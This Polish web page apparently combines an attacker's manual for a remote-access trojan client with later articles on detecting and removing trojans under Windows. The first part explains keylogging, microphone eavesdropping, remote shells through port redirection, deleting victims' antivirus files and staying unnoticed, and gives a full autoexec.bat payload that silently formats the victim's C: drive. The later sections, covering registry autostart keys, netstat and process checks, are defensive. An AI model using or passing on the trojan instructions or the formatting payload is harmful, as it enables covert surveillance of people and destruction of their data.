play sound - odgrywa plik o roszerzeniu *.wav na jego kompie (musi byc na jego hdd)
exit windows - wylaczenie, reeboot, wylogowanie z windowsow
send text - wysyla text do aktywnej aplikacj. (| - to enter)
Active windows - pokazuje aktywne okna, ktore mozemy mu zamknac
application redirect - jakby to powiedziec przeadresowanie aplikacji na jakis port np. command.com na jakis port, potem uruchamiamy poleceniem uruchom z menu start "telnet (jego ip) (nr portu)" np. "telnet 222.222.222.222 22222" 222.222.222.222 - jego ip 22222 - port na jaki przeadresowalismy aplikacje.
Mouse pos - w dwoch okienkach u gory podajemy wspolrzedne kursoru myszki np. 348|215 i gdy klikiniemy na mouse pos kursor tam sie znajdzie
Listen - mowi nam co w tej chwili koles pisze na klawiaturze, mozemy tez pisac za niego
sound system - regulujemy glosnosc dzwieku w windowsach i mozemy nasluchiwac co mowi do mikrofonu
server setup - mozemy zmienic m.in. haslo na servera oraz jezeli sobie zyczymy za kazdym razem gdy koles sie laczy z netem na nasza skrzynke przychodzi plik jaki ma ip. Radze wylaczyc funkcje log traffic poniewaz loguje co robilismy na kompie ofiary
control mouse - kontrola nad myszka (nie stosowac)
go to url - wpisujemy adres http i uruchamia na jego kompie przegladarke z tym adresem
key manager - mozemy zablokowac dostep do wszystkich klawiszy do pojedynczego lub sprawic zeby za kazdym razem jak nacisnie klawisz ze spikerka wydobywal sie glos: pyk
file manager - pokazuje zawartosc jego dysku, mozemy sciagac, umieszczac lub kasowac na jego dysku pliki (musimy jak najszybciej wykasowac mu pliki antywirusowe z hdd)
about - o autorze
memo - zapiski nasze
add ip - dodaje ip
del ip - kasuje ip
connect/disconnect - laczy/rozlacza
scan - skanuje ip ale slabo polecam trojan huntera
in interval - ile razy ma byc wykonana funkcja
function delay - po ilu sekundach ma byc wykonana funkcja
11. Bardzo wazne
Dam wam na zakonczenie pare porad:
1. co chcecie macie wykonac expresowo 2. nie zaczepiajcie kolesia komunikacikami i wysuwaniem klapki bo sie kapnie 3.bawienie sie trojanami jest nielegalne bo jest to nieupowaznione wejscie to czyjegos koma 4. na koniec nie formatujcie dysku i nie kasujcie plikow typu io.sys, win.com bo to bezsensu
Jezeli jednak koles was naprawde wkurzyl (dlugo sie opieral itepe itede) a na hdd ma tylko zainstalowana fife i irca to uploaduj mu plik autoexec.bat o takiej tresci
cut here ---------------- @echo off format c:/q >nul /autotest echo twoj komp jest zainfekowany wirusem AntiJFSDPN echo juz nic sie nie da zrobic echo cze
Wczesniej nalezy oryginalny plik autoexec.bat usunac.
;Trojany - Obrona
aniolek-tasmanski @ Sun 04-01-2004 20:30
Jak zabezpieczyć się przed trojanami !
1. Nie uruchamiać nieznanych programów. 2. Nie otwierać załączników dołączonych do poczty. 3. Nie wchodzić do internetu. 4. Nie włączać komputera. 5. Sprzedać komputer, lub oddać innym niech się oni teraz męczą.
pewnie skads to znacie ... tak, takich wspanialych rad jest od groma i troche sam juz mialem sprzedac kompa :-) bo mnie to do szewskiej pasji doprowadzalo ale przeciez jednak (podkreslam jednak) ten gruchot czasem sie przydaje wiec zaczalem grzebac w tym winszicie usuwac pliki dorabiac biblioteki i zmieniac rejestry na chybil trafil, co sie przy tym nainstalowalem windy od nowa (znam juz serial# na pamiec :-) powaga...) to moje ! cale to badziewie ma kilka podstawowych cech i od tego czeba zaczac
* po pierwsze kazdy trojan musi sie uruchamiac razem z systemem * po drugie kazdy nasluchuje na jakims porcie
oczywiscie jezeli wiemy co sie uruchmia przy starcie to nie ma sprawy jestesmy w 100% bezpieczni ! jest tylko jedno ale ...Windows sam uruchamia kilka tzw procesow (najczesciej tym mianem okreslamy programy ale nie zawsze) maja one jakies dziwne nazwy ktore nic nam nie mowia, jakies internaty, systraje, powerprofile, szedulingi e szkoda gadac
do rzeczy : jest kilka podstawowych miejsc w systemie ktore uruchamiaja automatycznie wpisany tam program np taki katalog w windowsie 'autostart' (c:windowsmenu start) ale nie bede sie rozwodzil bo to za proste
nieco bardziej ukrytym miejscem jest rejestr w kluczach :
HKEY_LOCAL_MACHINESoftwareMicrosoft WindowsCurrentVersionRun HKEY_CURRENT_USERSoftwareMicrosoft WindowsCurrentVersionRun
wystarczy dodac tam sciezke do programu to w tym wlasnie miejscu windows uruchamia swoje procesy i tam tez znajdziemy wiekrzosc trojanow tych starszych oczywiscie :-) Wiedzac juz jak sie trojan nazywa i znajac miejsce wystepowania po prostu go usuwamy ... (oczywiscie pod dosem albo chociaz w trybie awaryjnym) lepsze trojany wybieraja sobie juz istniejaca nazwe uruchamianego programu i podszywaja sie pod niego (proste do wykrycia bo program mial sie uruchomic a nie dziala !) nastepna generacja trojanow 'podszywajacych sie' uruchamiala nie tylko siebie ale i program pod ktory sie podszyla racepta na to jest sprawdzenie wielkosci programu uruchamianego i orginalu wszystkie uruchamiane programy (te windowsowskie) znajdziemy na plytce instalacyjnej
doktryna compatybilnosci microsoftu wymusila dwie bardzo ciekawe zaszlosci
polecenie 'run' i 'load' w pliku win.ini dzialaja one analogicznie do powyzszych
wszystkie opisane dziury windowsa bardzo latwo mozna kontrolowac programem msconfig.exe (c:windows) poczawszy od wersji 98
sa tam rowniez pliki zwane autoexec.bat i config.sys (c:) zwykle pliki textowe autoexec sluzy do uruchamiania programow (tylko dos) a config do ladowania sterownikow (tez dosowych) tylko raz spotkalem sie z trojanem ktory wrzucal do autoexec.bat maly programik dosowy dokonujacy modyfikacji rejestru (wpisywal po prostu do wyzej wymienionego klucza swoja nazwe) poco autor tak sie nakombinowal to niewiem :-)
ale podobna technike obserwuje coraz czesciej mala modyfikacja polega na uzyciu pliku win.com (plik ten uruchamiany jest domyslnie przez system zebysmy mogli wogule zobaczys windowsa w formie graficznej) naprawde ciezko zlokalizowac trojana uruchamianego w ten sposob
jak to dziala ?
pamietajmy ze win.com uruchamia programy dosowe maly programik uruchamiany przez win.com wpisuje do rejestru sciezke i nazwe wlasciwego trojana rejestr uruchamia trojana juz jako program windowsowy a pierwsza czynnosc trojana to usuniecie wpisu z rejestru (i sladu niema:-) )
odmiany tej techniki sa rozne : win.com uruchamia wininit.exe lub z parametrem wininit.ini (wykozystuje to program instalacyjny microsoftu i ddhelp.exe)
oczywiscie nie ma sensu sprawdzanie co chwile czy przypadkiem win.com lub wininit czegos nie uruchamia najpierw trzeba miec jakies podejzenia ... (albo chociaz przeczucia) przeczucia dziela sie na dwie gropy :
* przeczucia nieuzasadnione (nieodparte uczucie ze ktos nas obserwuje .. itd) - po prostu udajemy sie do lekarza
* przeczucia uzasadnione (wysowajaca sie kieszan CDRom, glupie komentarze systemu pod naszym adresem .. itd) - sprawdzamy czy mie ma przypadkiem trojana
podejzenia natomiast powoli powinny przeradzac sie w pewnosc
- a to zniknely wszystkie pliki z logami
- a to przez przypadek trafiamy na plik z wszystkimi znakami wcisnietymi na klawiaturze w ciagu ostatniego miesiaca
- a to trafiamy na pliczek z naszymi chaslami ...
- a to jakis niezidentyfikowany program laczy sie z netem
no jakby nie patrzec trzeba cos robic ! ale co ? sprawdzamy jakie porty sa otwarte w naszym kompie najprosciej zrobic sobie taki plik z rozszezeniem .bat a w nim:
:go netstat -a pause goto :go
no tak, ale windows sam otwiera kilka portow i nic w tym groznego ! jak odroznic te otwierane przez trojany ? nie mozna ! owszem starsze trojany mialy standardowe porty na ktorych nasluchiwaly clienta spis tych portow mozna znalesc bardzo latwo na wiekrzosci stron poswieconych temu tematowi nowsze trojany maja mozliwosc recznego ustawienia portu wiec kazdy jest jednakowo podejzany zreszta w tym temacie jest jeszcze wiele nieprzetartych drog jedynym sposobem jest zalozenie sobie jakiegos firewall'a (temu tematowi poswiecono tyle textow ze ja na szczescie juz nie musze !) dopiero w momencie polaczenia sie servera (czyli programu w naszym kompie) z clientem (czyli programem oprawcy) mozemy cos zdzialac przede wszystkim jezeli nie mamy zadnego programu logujacego polaczenia zapiszmy IP komputera ktory sie z nami laczy zapiszmy na jakim porcie przystapmy do usowania trojana najpierw ustalamy ktory to program i gdzie sie znajduje przede wszystkim uruchamiamy komputer w trybie dos lub awaryjnym na podstawie powyzszych sposobow uruchamiania trojanow przeszukujemy dziury windowsa pod katem niezidentyfikowanego programu po znalezieniu - usuwamy ! prawda jakie to proste :-) pamietajcie znajomosc systemu chroni mas w 100 %
pozdro BaaS
Wykrywanie koni trojańskich (backdoor'ów)
.................................................Wykrywanie trojanów we własnym komputerze wcale nie jest łatwą sprawą. Najczęściej zauważamy, że system zaczyna czasami spowalniać, wiesza się, wykonuje nieoczekiwane zadania, pojawiają się ikony lub skróty do programów których nie instalowaliśmy.
................................................Aby skutecznie wykrywać i zwalczać te szkodniki należy dobrze poznać własny system oraz programy zabezpieczające. Do podstawowych metod wykrywania i zwalczanie trojanów należy zaliczyć:
1. Używanie programów antywirusowych i antytrojanowych
2. Podgląd używanych procesów i programów (znajomość programów używanych)
3. Kontrola portów oraz połączeń komputera z siecią
4. Kontrola ilości zajmowanej pamięci operacyjnej.
........................................Wszystkie powyższe metody pozwalają wykryć różnego rodzaju szkodliwe programy, za pomocą oprogramowania antywirusowego i antytrojanowego zwalczać można szkodniki wykrywalne, punkty 2 , 3 , 4 dotyczą wykrywania oprogramowania szpiegującego, które jest jeszcze niewykrywane przez antywirusy.
Metody wykrywania trojanów.
1) Używanie programów antywirusowych.
Używanie programów typu antywirus, antytrojan, antyspyware itp..jest najprostszą i podstawową metodą zwalczania i zapobiegania działalności szkodliwych programów na naszych komputerach. Dzięki tego typu programom można skutecznie uniemożliwić instalację oraz działalność większości programów szkodliwych i szpiegujących nasze systemy. Ponadto jeśli nawet w usuwaniu lub zablokowaniu wykazują niską lub żadną skutecznośc można skożystać z informacji jaką udzielają o rodzaju infekcji i nazwie pliku (plików) które są przyczyną infekcji.Jeżeli zostanie wykryty szkodliwy program należy zanotować jego nazwę, nazwę pliku (często nazwa pliku może być inna niż nazwa wirusa)oraz ścieżkę dostępu do tego pliku (umiejscowienie w komputerze). Dane te będą wykożystane w usuwaniu zagrożenia.
2) Podgląd używanych procesów i programów (znajomość programów używanych)
Znajomość własnego systemu i oprogramowania jest dużym atutem przy wykrywaniu szkodliwych programów w naszym komputerze. Pozwala w szybki i sprawny sposób wyszukać wśród pracujących programów oraz uruchomionych procesów (tych widocznych i tych co działają w tle) procesy i funkcje które należą do programów pasożytniczych (trojany, backdoory, spywary itp.).
Do tego celu można wykorzystać najprostsze metody, wciskając równocześnie klawisze na klawiaturze Ctrl + Alt + Delete otworzymy okno aktywnych programów i w nim należy zobaczyć czy nie ma programu który jest wirusem, w tym celu należy uwzględnić jakie programy mamy aktualnie używane , jakie programy używamy z autostartu pracujące w zasobniku systemowym oraz programy związane z pracą systemu działające w tle.
Niestety duża częśc trojanów potrafi się zamaskować przed oknem podglądu programów i bardziej skuteczną metodą jest jakikolwiek program do podglądu procesów, np. darmowy ProcessViewer.
W oknie podglądu procesów z regóły można zobaczyć do jakich programów odwołują się aktywne procesy, jakie pliki je wywołują i jakiej produkcji są to programy.W ten sposób możemy ustalić czy któryś z procesów należeć może do wirusa i ewentualnie zamknąć proces (zabić proces).
3) Kontrola portów oraz połączeń komputera z siecią
Kontrolując otwarte porty na swoim komputerze jest możliwośc ustalenia czy nie jest nawiązywane połączenie z internetem służące do inwigilacji bądź transferu plików z naszego komputera wywołane przez inny komputer bez naszej zgody i wiedzy.
Najprostszą metodą jest wydanie polecenia
00000000000netstat -a
wówczas zostaną przeskanowane nasze porty i wyniki zobaczymy w oknie dosowskim.
A tam wyświetli się protokół, adres lokalny z numerem portu, obcy adres, stan. Na podstawie tej prostej czynności można ustalić czy nasz komputer nie jest połączony z adresem z którym nie mieliśmy się zamiaru łączyć i na dodatek za pomocą jakiego protokołu. Oprócz tej metody można wykorzystać dane z firewalla (bardziej szczegółowe) oraz różnego rodzaju kontrolerów portów.
Dzięki temu możemy poznać nazwę pliku, nazwę wirusa oraz numer portu przez który się łączy, wówczas wystarczy sprawdzić jaki numer portu dany trojan ma jako domyślny i zablokować numer portu przez który się łączy oraz numer domyślny portu połaczenia trojana (czasem po zablokowaniu portu połączenia trojan może nawiązać ponownie połączenie przez port domyślny dzięki czemu zostanie przekonfigurowany na połączenie przez inny port). Jest to bardzo skuteczna metoda wyszukiwania połączeń wywoływanych różnego rodzaju szkodliwymi programami.
4)Kontrola ilości zajmowanej pamięci operacyjnej.
Tej metody nie będę omawiał ponieważ jest to metoda dla zwykłego użytkownika komputera dość skomplikowana i raczej częściej wykorzystywana przez programy antywirusowe (moduły takiego programu analizują pamięć operacyjną zajmowaną przez niektóre programy i przydzielane im adresy).
Wspomnę jedynie o prostym teście lecz mało skutecznym i głównie dotyczy on wirusów bootsektorów.
Restartując komputer wciskamy klawisz Ctrl lub klawisz F8, po chwili zobaczymy menu startowe Windows. Wybieramy opcję
Tylko linia poleceń trybu awaryjnego
w oknie msdos po znaku zachęty wpisujemy polecenie
chkdsk
klikamy Enter i zobaczymy wówczas ile jest pamięci, prawidłowo powinno być :
655 360 B
jeżeli jest mniej to znaczy, że jest w komputerze wirus, lecz muszę wyjaśnić, że jeżeli wskaże wynik 655 360 to wcale nie oznacza, że mamy komputer bez wirusów, jedynie wiemy iż nie mamy takich w bootsektorach.
Moim zdaniem badanie pamięci nie jest metodą godną polecenia ale musiałem o tej metodzie jednak napomknąć aby uświadomić ,że coś takiego istnieje.
Podsumowanie
..................................................Reasumując, najważniejszą sprawą jest zdobycie informacji o tym czy :
-mamy zainstalowany w komputerze szkodliwy program (backdoor (trojan), spyware)
-jaka jest jego nazwa (nazwa trojana) wówczas można poszukać informacji o zagrożeniach jakie może wywoływać oraz o sposobie jego usunięcia
-jaka jest nazwa pliku (często plik ma nazwę inną niż trojan) oraz jego umiejscowienie (ścieżka dostępu do pliku [plików])
.................................................Na następnych stronach zostały opisane:
Uniwersalna metoda usuwania backdoorów i trojanów (skuteczna wobec 96% tego typu aplikacji)
Lista portów domyślnych backdoorów i trojanów
Lista programów do zwalczania różnego rodzaju wirusów i programów pomagających w zwalczaniu wirusów
KONTAKT NETSKY P.K. TEL.: 518-348-082 SMS.: 518-348-082 |
|
 |
|
 |
|
 |
|
